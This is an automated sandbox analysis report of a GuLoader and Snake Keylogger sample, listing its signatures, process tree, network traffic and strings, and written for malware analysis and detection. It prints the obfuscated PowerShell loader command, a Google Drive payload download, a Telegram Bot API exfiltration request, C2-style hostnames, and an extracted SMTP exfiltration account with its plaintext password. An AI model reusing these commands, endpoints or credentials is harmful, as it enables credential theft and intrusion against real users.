Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
87h216Snb7.exe

Overview

General Information

Sample name:87h216Snb7.exe
renamed because original name is a hash value
Original sample name:a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac.exe
Analysis ID:1576727
MD5:c9007399358b2c71f94731c0dada3aae
SHA1:52961d38410067be7256356aa18ee52051bef614
SHA256:a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 87h216Snb7.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\87h216Snb7.exe" MD5: C9007399358B2C71F94731C0DADA3AAE)
    • powershell.exe (PID: 4552 cmdline: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7304 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "administracion@fungiclm.com", "Password": "FungiCLM-Administracion24", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 7304JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 7304JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7304, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49752
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4552, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , CommandLine: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87h216Snb7.exe", ParentImage: C:\Users\user\Desktop\87h216Snb7.exe, ParentProcessId: 3736, ParentProcessName: 87h216Snb7.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , ProcessId: 4552, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-17T13:21:50.157618+010028033053Unknown Traffic192.168.2.749790104.21.67.152443TCP
          2024-12-17T13:22:02.337091+010028033053Unknown Traffic192.168.2.749823104.21.67.152443TCP
          2024-12-17T13:22:05.227115+010028033053Unknown Traffic192.168.2.749834104.21.67.152443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-17T13:21:45.729182+010028032742Potentially Bad Traffic192.168.2.749778193.122.130.080TCP
          2024-12-17T13:21:48.541697+010028032742Potentially Bad Traffic192.168.2.749778193.122.130.080TCP
          2024-12-17T13:21:51.432452+010028032742Potentially Bad Traffic192.168.2.749794193.122.130.080TCP
          2024-12-17T13:21:54.573138+010028032742Potentially Bad Traffic192.168.2.749802193.122.130.080TCP
          2024-12-17T13:21:57.789006+010028032742Potentially Bad Traffic192.168.2.749813193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-17T13:21:36.718510+010028032702Potentially Bad Traffic192.168.2.749752172.217.19.174443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administracion@fungiclm.com", "Password": "FungiCLM-Administracion24", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Source: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exeReversingLabs: Detection: 42%
          Source: 87h216Snb7.exeReversingLabs: Detection: 42%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: 87h216Snb7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49784 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49854 version: TLS 1.2
          Source: 87h216Snb7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: re.pdbht9$ source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
          Source: C:\Users\user\Desktop\87h216Snb7.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326CF49h11_2_2326CCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23260D0Dh11_2_23260B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23261697h11_2_23260B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326EDB1h11_2_2326EB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326F209h11_2_2326EF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326F661h11_2_2326F3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326E0A9h11_2_2326DE00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_23260673
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326E501h11_2_2326E258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326E959h11_2_2326E6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 232631E0h11_2_2326310E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 23262C19h11_2_23262968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326D7F9h11_2_2326D550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326DC51h11_2_2326D9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 232631E0h11_2_23262DBB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 232631E0h11_2_23262DC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326FAB9h11_2_2326F810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_23260040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_23260853
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2326D3A1h11_2_2326D0F8

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
          Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49794 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49802 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49813 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49778 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49790 -> 104.21.67.152:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49752 -> 172.217.19.174:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49834 -> 104.21.67.152:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 104.21.67.152:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49784 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 12:22:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: 87h216Snb7.exe, 87h216Snb7.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enx
          Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/DU
          Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2528121645.0000000020100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D
          Source: msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
